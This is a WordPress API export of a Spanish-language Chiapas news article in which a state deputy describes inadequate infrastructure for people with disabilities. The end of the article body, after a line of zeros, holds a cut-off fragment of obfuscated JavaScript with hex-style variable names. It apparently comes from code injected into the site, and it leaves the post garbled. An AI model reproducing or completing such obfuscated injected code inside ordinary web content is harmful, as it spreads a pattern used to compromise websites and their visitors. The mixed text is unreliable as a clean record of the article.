{"id":18292,"date":"2024-10-10T02:56:13","date_gmt":"2024-10-10T02:56:13","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=18292"},"modified":"2024-10-10T02:56:14","modified_gmt":"2024-10-10T02:56:14","slug":"no-hay-infraestructura-adecuada-para-personas-con-discapacidad","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=18292","title":{"rendered":"No hay infraestructura adecuada para personas con discapacidad"},"content":{"rendered":"\n\n\n<p>Manuel Jim\u00e9nez.<\/p>\n\n\n\n<p>9 de octubre del 2024. Tuxtla Guti\u00e9rrez. &#8211; La falta de infraestructura adecuada, para realizar cualquier actividad es el principal obst\u00e1culo que enfrenta la poblaci\u00f3n con diferentes tipos de discapacidad, y por ello es un tema que debe atenderse, expuso Luz Mar\u00eda Castillo Moreno, la primera diputada que representa a la poblaci\u00f3n en el Congreso del Estado de Chiapas.<\/p>\n\n\n\n<p>\u201cPor ello, nuestra agenda legislativa ser\u00e1 la de hacer valer los derechos de las personas con discapacidad, que anteriormente la perspectiva era de discriminaci\u00f3n\u201d, expres\u00f3.<\/p>\n\n\n\n<p>Reconoci\u00f3 que, con la nueva era de la mano del doctor Eduardo Ram\u00edrez Aguilar, se est\u00e1 cambiando esta perspectiva, por una perspectiva humanista, donde todos tengan los mismos derechos y dejen de ser grupos vulnerables.<\/p>\n\n\n\n<p>La diputada de Morena, es abogada, con doctorado en derechos humanos, originaria de Comit\u00e1n de Dom\u00ednguez, en donde fue regidora suplente en el 2015, fue defensora municipal de los derechos humanos 2021-2022; y tambi\u00e9n fue coordinadora de Desarrollo y Fomento Humano, recibi\u00f3 la invitaci\u00f3n del partido, para formar parte de esta Sexag\u00e9sima Novena Legislatura.<\/p>\n\n\n\n<p>Coment\u00f3 que, en el estado de Chiapas no existe un censo de cu\u00e1ntas personas con discapacidad existen,<br>sin embargo, hay estimaciones de una cifra de aproximadamente 300 mil personas.<\/p>\n\n\n\n<p>\u201cEl estado de Chiapas no cuenta con un padr\u00f3n oficial pues consideramos que en los Altos de Chiapas, por las creencias y costumbres, pues la mayor\u00eda de las veces no hemos tenido el acceso a la informaci\u00f3n, si hay poblaci\u00f3n con discapacidad\u201d..<\/p>\n\n\n\n<p>\u201cLlevamos nueve a\u00f1os de activismo en favor de los derechos humanos de las personas con discapacidad. Y buscamos impulsar el acceso a una inclusi\u00f3n laboral, el acceso a infraestructura adecuada y espacios dignos como el transporte p\u00fablico que es una de las principales barreras con las que se encuentran, y hasta el momento no se ha tenido una atenci\u00f3n verdadera a este tema\u201d, puntualiz\u00f3.<br>000000000<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Manuel Jim\u00e9nez. 9 de octubre del 2024. Tuxtla Guti\u00e9rrez. &#8211; La falta de infraestructura adecuada, para realizar cualquier actividad es el principal obst\u00e1culo que enfrenta la poblaci\u00f3n con diferentes tipos de discapacidad, y por ello es un tema que debe atenderse, expuso Luz Mar\u00eda Castillo Moreno, la primera diputada que representa a la poblaci\u00f3n en &hellip;<\/p>\n","protected":false},"author":2,"featured_media":18293,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-18292","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/18292","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=18292"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/18292\/revisions"}],"predecessor-version":[{"id":18294,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/18292\/revisions\/18294"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/18293"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=18292"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=18292"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=18292"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}